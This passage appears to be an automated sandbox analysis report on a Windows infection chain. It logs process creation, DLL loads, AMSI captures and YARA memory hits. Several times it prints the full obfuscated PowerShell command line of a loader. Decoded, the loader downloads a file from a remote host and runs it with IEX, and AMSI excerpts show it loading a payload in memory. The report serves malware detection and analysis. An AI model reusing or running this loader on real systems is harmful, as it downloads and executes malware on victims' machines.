',rindeh[ TrypaonT rolsueFiligratM,ltino.BeratedsvgaviseeKadrernr arneruVArtesynIPreexpec iretogeOpodidyPTriang,OSkattemiHankytoNAfvarsltFissio.muigenneAOverflyNOutrowsa FortriGOffertoEEksponer housli]Distill:Vaadesk:Dagbr
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c ping 6777.6777.6777.677e Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#nettenes Semipopular overstates Photodrome #>;$Lighedsideologis='Omrrer';<#Arbejdsbevgelser Allodialist Amanist Lydkilden Bortvejrede Peristole #>;$Occipitobregmatic=$Recrate149+$host.'PrivateData';If ($Occipitobregmatic) {$Rykkendes++;}function Ridsning89($Kabine){$Tardy=$Gehejmeraaden+$Kabine.Length-$Rykkendes; for( $Antilogarithmic=7;$Antilogarithmic -lt $Tardy;$Antilogarithmic+=8){$Achim='Filterbredders';$Molition+=$Kabine[$Antilogarithmic];$Facetter='Krigserklringer';}$Molition;}function Ruttendes80($Driftsregnskabet){ & ($Ansgningsfristen151) ($Driftsregnskabet);}$Nondiffusible=Ridsning89 'M.urernM Hem,meoAlfaderzHexin,niTingsvil Platonlsk ddera V nero/Dublan 5 Dumpek.Fisende0 Van.it Ostrace( Penc lW Sever,i Sym olnSkoles.dNonubiqoMissilswH,dderrsListles Semi acNlivegenT ,istol Mngder 1Habitus0strandf.Pronoun0 Unloqu;Wh tero RundsaWOpprioriEroderinNjesb,g6Maatter4Gerning;Rekrter VillaexGydning6Rensni,4Barrica;Undisc Foggi r luorev Noelge: Ytri.g1Humors 2Underho1Chrysa .Knivsme0Triker,) kademi postedGSelvbyge jergarcIndtagekSh ndyioUn easi/Per ore2airchec0Konform1Subtrak0Afvegne0Coloniz1 Is,ide0Moviepk1 Bovrup SkrudsaFUngoadeiDyslysirKonstrueF rekomfSteto koHydr baxOrkidxj/ So,ial1Turbomo2Banc,dr1 Doozie. E ilog0Polyaem ';$enere=Ridsning89 'BoningeUSmmomets Forthce ReinfurCirc mv-.oninteaGlairiegTitt pye Duss sNLinuxwit emul e ';$oversaettelser=Ridsning89 ' Temp lhTilendetFagretltjuleferpSuissef: andomr/ nthrac/ AvidlysBaldakiiPodargilFiletfai FlaxwonFerskvaalycop rsIndes.rt akettr.OdisblarKatedero Anfgte/CausticKSuboperoOverfrimElf nbemUnd.rstu unmaknToneskiiDementek Loc,moutransmut AfgoereTillg brR turnenPregalve FagidisDisarti.Rettetai DebetsnBarneskf Hj,rpe ';$Rustrdes=Ridsning89 'Snrkled>Kol nna ';$Ansgningsfristen151=Ridsning89 'AdmittaIGtesengEB talinXShownce ';$Lifefully169='forvrredes';$Fagbog='\Selvsikkerhedens.Pan';Ruttendes80 (Ridsning89 'Rygskca$KonomiigBughindLSpoonfuoAf ekslbInduk,iATehtterL Un ors:Uskad la Kont ar Mora deTjen.reN CompriIPo eredG Una so=Strappa$StttekrELampetcNTrenchaV Af.ejs:UdringeaImmunogpRullersPGa enesdStraffoAOp egniTFuracioACloques+Tredve.$Rec iliFOverskgaBogach gSwaverpBSexsymbOOrgueslGNazdrow ');Ruttendes80 (Ridsning89 'Satinsk$Po encegCol,barlSecretiO UltrasbRampageAFumlendL Ompo t:Solariur Vel,ilePaaklisMSidstemiForblfnsHeteroteQuadruprStandarNbroderiEXiphipl=Unpatri$CuttlefoZ.braerv ppositE N gaciRbnk bids Dwe.leAHolbaekeSo,brreTOralizeTPlia.tnEOmvurd l SysselsBrintboEHym.ariRforsker..almoniS Monu,epN.tlistLMycof oIsubricttBajadse(formule$Bra.skoremotiviuKowbirdsisnenneT torherROverid.dFrowsilED.ctyopSstre.kd) Maskab ');Ruttendes80 (Ridsning89 ',rindeh[ TrypaonT rolsueFiligratM,ltino.BeratedsvgaviseeKadrernr arneruVArtesynIPreexpec iretogeOpodidyPTriang,OSkattemiHankytoNAfvarsltFissio.muigenneAOverflyNOutrowsa FortriGOffertoEEksponer housli]Distill:Vaadesk:Dagbr Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 6777.6777.6777.677e Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{06290BD0-48AA-11D2-8432-006008C3FBFC}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000004.00000002.2138100600.000002CC9D367000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ion.pdb source: powershell.exe, 00000004.00000002.2136856117.000002CC9D1CD000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("powershell "<#nettenes Semipopular overstates Photodrome #>;$Lighedsideologis='Omrrer';<#Arbejdsbevgelser Allodia", "0")
Source: Yara match File source: 00000009.00000002.4239592864.00000000095B5000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.4239463001.0000000008370000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.4228266092.00000000055C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2131900489.000002CC94CF3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Galgal212)$gLobaL:pROJekTmAGerEN = [SYstEM.TExT.EnCODInG]::AsCii.geTsTrIng($SkRmkoRtEts)$GlObAL:fUnNeLFoRM=$pROJEKtMAgeREN.SUbsTRINg($TTTEdEs,$SAltEne)<#Wurrung Akseltappenes Hobbier
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Acrophony77 $Mellemstykkers $Dataoverfrsels), (Nedskre @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Trffe = [AppDomain]::CurrentDomain.GetAssemblies()$g
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Embroideress)), $Choregraphicallydeaful).DefineDynamicModule($Perfekte172, $false).DefineType($Servicekonceptets, $Standsflle14, [Syst
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Galgal212)$gLobaL:pROJekTmAGerEN = [SYstEM.TExT.EnCODInG]::AsCii.geTsTrIng($SkRmkoRtEts)$GlObAL:fUnNeLFoRM=$pROJEKtMAgeREN.SUbsTRINg($TTTEdEs,$SAltEne)<#Wurrung Akseltappenes Hobbier
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#nettenes Semipopular overstates Photodrome #>;$Lighedsideologis='Omrrer';<#Arbejdsbevgelser Allodialist Amanist Lydkilden Bortvejrede Peristole #>;$Occipitobregmatic=$Recrate149+$host.'PrivateData';If ($Occipitobregmatic) {$Rykkendes++;}function Ridsning89($Kabine){$Tardy=$Gehejmeraaden+$Kabine.Length-$Rykkendes; for( $Antilogarithmic=7;$Antilogarithmic -lt $Tardy;$Antilogarithmic+=8){$Achim='Filterbredders';$Molition+=$Kabine[$Antilogarithmic];$Facetter='Krigserklringer';}$Molition;}function Ruttendes80($Driftsregnskabet){ & ($Ansgningsfristen151) ($Driftsregnskabet);}$Nondiffusible=Ridsning89 'M.urernM Hem,meoAlfaderzHexin,niTingsvil Platonlsk ddera V nero/Dublan 5 Dumpek.Fisende0 Van.it Ostrace( Penc lW Sever,i Sym olnSkoles.dNonubiqoMissilswH,dderrsListles Semi acNlivegenT ,istol Mngder 1Habitus0strandf.Pronoun0 Unloqu;Wh tero RundsaWOpprioriEroderinNjesb,g6Maatter4Gerning;Rekrter VillaexGydning6Rensni,4Barrica;Undisc Foggi r luorev Noelge: Ytri.g1Humors 2Underho1Chrysa .Knivsme0Triker,) kademi postedGSelvbyge jergarcIndtagekSh ndyioUn easi/Per ore2airchec0Konform1Subtrak0Afvegne0Coloniz1 Is,ide0Moviepk1 Bovrup SkrudsaFUngoadeiDyslysirKonstrueF rekomfSteto koHydr baxOrkidxj/ So,ial1Turbomo2Banc,dr1 Doozie. E ilog0Polyaem ';$enere=Ridsning89 'BoningeUSmmomets Forthce ReinfurCirc mv-.oninteaGlairiegTitt pye Duss sNLinuxwit emul e ';$oversaettelser=Ridsning89 ' Temp lhTilendetFagretltjuleferpSuissef: andomr/ nthrac/ AvidlysBaldakiiPodargilFiletfai FlaxwonFerskvaalycop rsIndes.rt akettr.OdisblarKatedero Anfgte/CausticKSuboperoOverfrimElf nbemUnd.rstu unmaknToneskiiDementek Loc,moutransmut AfgoereTillg brR turnenPregalve FagidisDisarti.Rettetai DebetsnBarneskf Hj,rpe ';$Rustrdes=Ridsning89 'Snrkled>Kol nna ';$Ansgningsfristen151=Ridsning89 'AdmittaIGtesengEB talinXShownce ';$Lifefully169='forvrredes';$Fagbog='\Selvsikkerhedens.Pan';Ruttendes80 (Ridsning89 'Rygskca$KonomiigBughindLSpoonfuoAf ekslbInduk,iATehtterL Un ors:Uskad la Kont ar Mora deTjen.reN CompriIPo eredG Una so=Strappa$StttekrELampetcNTrenchaV Af.ejs:UdringeaImmunogpRullersPGa enesdStraffoAOp egniTFuracioACloques+Tredve.$Rec iliFOverskgaBogach gSwaverpBSexsymbOOrgueslGNazdrow ');Ruttendes80 (Ridsning89 'Satinsk$Po encegCol,barlSecretiO UltrasbRampageAFumlendL Ompo t:Solariur Vel,ilePaaklisMSidstemiForblfnsHeteroteQuadruprStandarNbroderiEXiphipl=Unpatri$CuttlefoZ.braerv ppositE N gaciRbnk bids Dwe.leAHolbaekeSo,brreTOralizeTPlia.tnEOmvurd l SysselsBrintboEHym.ariRforsker..almoniS Monu,epN.tlistLMycof oIsubricttBajadse(formule$Bra.skoremotiviuKowbirdsisnenneT torherROverid.dFrowsilED.ctyopSstre.kd) Maskab ');Ruttendes80 (Ridsning89 ',rindeh[ TrypaonT rolsueFiligratM,ltino.BeratedsvgaviseeKadrernr arneruVArtesynIPreexpec iretogeOpodidyPTriang,OSkattemiHankytoNAfvarsltFissio.muigenneAOverflyNOutrowsa FortriGOffertoEEksponer housli]Distill:Vaadesk:Dagbr
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#nettenes Semipopular overstates Photodrome #>;$Lighedsideologis='Omrrer';<#Arbejdsbevgelser Allodialist Amanist Lydkilden Bortvejrede Peristole #>;$Occipitobregmatic=$Recrate149+$host.'PrivateData';If ($Occipitobregmatic) {$Rykkendes++;}function Ridsning89($Kabine){$Tardy=$Gehejmeraaden+$Kabine.Length-$Rykkendes; for( $Antilogarithmic=7;$Antilogarithmic -lt $Tardy;$Antilogarithmic+=8){$Achim='Filterbredders';$Molition+=$Kabine[$Antilogarithmic];$Facetter='Krigserklringer';}$Molition;}function Ruttendes80($Driftsregnskabet){ & ($Ansgningsfristen151) ($Driftsregnskabet);}$Nondiffusible=Ridsning89 'M.urernM Hem,meoAlfaderzHexin,niTingsvil Platonlsk ddera V nero/Dublan 5 Dumpek.Fisende0 Van.it Ostrace( Penc lW Sever,i Sym olnSkoles.dNonubiqoMissilswH,dderrsListles Semi acNlivegenT ,istol Mngder 1Habitus0strandf.Pronoun0 Unloqu;Wh tero RundsaWOpprioriEroderinNjesb,g6Maatter4Gerning;Rekrter VillaexGydning6Rensni,4Barrica;Undisc Foggi r luorev Noelge: Ytri.g1Humors 2Underho1Chrysa .Knivsme0Triker,) kademi postedGSelvbyge jergarcIndtagekSh ndyioUn easi/Per ore2airchec0Konform1Subtrak0Afvegne0Coloniz1 Is,ide0Moviepk1 Bovrup SkrudsaFUngoadeiDyslysirKonstrueF rekomfSteto koHydr baxOrkidxj/ So,ial1Turbomo2Banc,dr1 Doozie. E ilog0Polyaem ';$enere=Ridsning89 'BoningeUSmmomets Forthce ReinfurCirc mv-.oninteaGlairiegTitt pye Duss sNLinuxwit emul e ';$oversaettelser=Ridsning89 ' Temp lhTilendetFagretltjuleferpSuissef: andomr/ nthrac/ AvidlysBaldakiiPodargilFiletfai FlaxwonFerskvaalycop rsIndes.rt akettr.OdisblarKatedero Anfgte/CausticKSuboperoOverfrimElf nbemUnd.rstu unmaknToneskiiDementek Loc,moutransmut AfgoereTillg brR turnenPregalve FagidisDisarti.Rettetai DebetsnBarneskf Hj,rpe ';$Rustrdes=Ridsning89 'Snrkled>Kol nna ';$Ansgningsfristen151=Ridsning89 'AdmittaIGtesengEB talinXShownce ';$Lifefully169='forvrredes';$Fagbog='\Selvsikkerhedens.Pan';Ruttendes80 (Ridsning89 'Rygskca$KonomiigBughindLSpoonfuoAf ekslbInduk,iATehtterL Un ors:Uskad la Kont ar Mora deTjen.reN CompriIPo eredG Una so=Strappa$StttekrELampetcNTrenchaV Af.ejs:UdringeaImmunogpRullersPGa enesdStraffoAOp egniTFuracioACloques+Tredve.$Rec iliFOverskgaBogach gSwaverpBSexsymbOOrgueslGNazdrow ');Ruttendes80 (Ridsning89 'Satinsk$Po encegCol,barlSecretiO UltrasbRampageAFumlendL Ompo t:Solariur Vel,ilePaaklisMSidstemiForblfnsHeteroteQuadruprStandarNbroderiEXiphipl=Unpatri$CuttlefoZ.braerv ppositE N gaciRbnk bids Dwe.leAHolbaekeSo,brreTOralizeTPlia.tnEOmvurd l SysselsBrintboEHym.ariRforsker..almoniS Monu,epN.tlistLMycof oIsubricttBajadse(formule$Bra.skoremotiviuKowbirdsisnenneT torherROverid.dFrowsilED.ctyopSstre.kd) Maskab ');Ruttendes80 (Ridsning89 ',rindeh[ TrypaonT rolsueFiligratM,ltino.BeratedsvgaviseeKadrernr arneruVArtesynIPreexpec iretogeOpodidyPTriang,OSkattemiHankytoNAfvarsltFissio.muigenneAOverflyNOutrowsa FortriGOffertoEEksponer housli]Distill:Vaadesk:Dagbr
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#nettenes Semipopular overstates Photodrome #>;$Lighedsideologis='Omrrer';<#Arbejdsbevgelser Allodialist Amanist Lydkilden Bortvejrede Peristole #>;$Occipitobregmatic=$Recrate149+$host.'PrivateData';If ($Occipitobregmatic) {$Rykkendes++;}function Ridsning89($Kabine){$Tardy=$Gehejmeraaden+$Kabine.Length-$Rykkendes; for( $Antilogarithmic=7;$Antilogarithmic -lt $Tardy;$Antilogarithmic+=8){$Achim='Filterbredders';$Molition+=$Kabine[$Antilogarithmic];$Facetter='Krigserklringer';}$Molition;}function Ruttendes80($Driftsregnskabet){ & ($Ansgningsfristen151) ($Driftsregnskabet);}$Nondiffusible=Ridsning89 'M.urernM Hem,meoAlfaderzHexin,niTingsvil Platonlsk ddera V nero/Dublan 5 Dumpek.Fisende0 Van.it Ostrace( Penc lW Sever,i Sym olnSkoles.dNonubiqoMissilswH,dderrsListles Semi acNlivegenT ,istol Mngder 1Habitus0strandf.Pronoun0 Unloqu;Wh tero RundsaWOpprioriEroderinNjesb,g6Maatter4Gerning;Rekrter VillaexGydning6Rensni,4Barrica;Undisc Foggi r luorev Noelge: Ytri.g1Humors 2Underho1Chrysa .Knivsme0Triker,) kademi postedGSelvbyge jergarcIndtagekSh ndyioUn easi/Per ore2airchec0Konform1Subtrak0Afvegne0Coloniz1 Is,ide0Moviepk1 Bovrup SkrudsaFUngoadeiDyslysirKonstrueF rekomfSteto koHydr baxOrkidxj/ So,ial1Turbomo2Banc,dr1 Doozie. E ilog0Polyaem ';$enere=Ridsning89 'BoningeUSmmomets Forthce ReinfurCirc mv-.oninteaGlairiegTitt pye Duss sNLinuxwit emul e ';$oversaettelser=Ridsning89 ' Temp lhTilendetFagretltjuleferpSuissef: andomr/ nthrac/ AvidlysBaldakiiPodargilFiletfai FlaxwonFerskvaalycop rsIndes.rt akettr.OdisblarKatedero Anfgte/CausticKSuboperoOverfrimElf nbemUnd.rstu unmaknToneskiiDementek Loc,moutransmut AfgoereTillg brR turnenPregalve FagidisDisarti.Rettetai DebetsnBarneskf Hj,rpe ';$Rustrdes=Ridsning89 'Snrkled>Kol nna ';$Ansgningsfristen151=Ridsning89 'AdmittaIGtesengEB talinXShownce ';$Lifefully169='forvrredes';$Fagbog='\Selvsikkerhedens.Pan';Ruttendes80 (Ridsning89 'Rygskca$KonomiigBughindLSpoonfuoAf ekslbInduk,iATehtterL Un ors:Uskad la Kont ar Mora deTjen.reN CompriIPo eredG Una so=Strappa$StttekrELampetcNTrenchaV Af.ejs:UdringeaImmunogpRullersPGa enesdStraffoAOp egniTFuracioACloques+Tredve.$Rec iliFOverskgaBogach 